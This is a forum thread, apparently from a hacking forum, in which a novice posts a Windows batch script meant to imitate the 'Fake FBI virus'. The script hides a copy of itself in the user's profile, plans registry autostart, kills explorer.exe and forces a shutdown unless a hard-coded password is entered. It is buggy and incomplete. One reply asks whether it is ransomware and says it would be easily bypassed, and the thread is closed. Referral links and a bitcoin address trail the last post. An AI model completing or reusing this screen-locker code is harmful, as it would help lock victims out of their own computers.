Login Register


Creating a lock-down password bat filter_list
Author
Message
Creating a lock-down password bat #1
Okay, I'm trying to create a Batch file that autorun on login or before doesn't matter. I am trying to get it to Lock out user until they enter the password in the batch file. I don't know if it is possible sense bat Is limited. If I can get some help that would be great So far the password works, and the shut down. I am trying to recreate something like the Fake FBI viruse, but with out the webpage. I am new to coding. So far I have this.

@echo off
title d
:a
If not exist "%userprofile%\program\d.bat" goto b
If exist"%userprofile%\program\d.bat" >null goto c

:b
copy "d.bat" "%userprofile%\program\d.bat" >null
goto c
(error in the above line, need to wirte register to autostart)
:c
taskkill /f /IM explorer.exe
attrib +h "%userprofile%\program\d.bat" >null

echo enter password to Login
set/p "pass=>"
if NOT %pass%== 400670 goto Confusedhutdown -s
if %pass%== 400670 goto d
:d start explore.exe

(explorer doesn't seem to start back up when the correct password entered)

If anyone can help me that would be great!


RE: Implementing a security #2
How is this title related to the content?


RE: Implementing a security #3
what? I do not understand o.O
:bye:


RE: Creating a lock-down password bat #4
I'm confused, are you trying to create Ransomware with a batch file? Batch probably wouldn't be the best route to take for ransomware, & if you're not encrypting the files on the victim's machine, its going to be very easily bypassed.

So what is it you're trying to do, & what is its intent? There's may be a better approach. Smile


RE: Creating a lock-down password bat #5
(06-25-2014, 10:52 PM)Aut•ono•mous Wrote: I'm confused, are you trying to create Ransomware with a batch file? Batch probably wouldn't be the best route to take for ransomware, & if you're not encrypting the files on the victim's machine, its going to be very easily bypassed.

So what is it you're trying to do, & what is its intent? There's may be a better approach. Smile

I very much doubt OP will still be interested in this since it was posted over a year ago and hasn't been online in almost as long

/closed
If you need help feel free to PM me
[Image: klfpJD]
Probitcoin
Freebitcoin
BTC clicks
bitcoin wallet:
1FBPAanbs3rJU9BUpobpDJc9hHUaCaC25N








Users browsing this thread: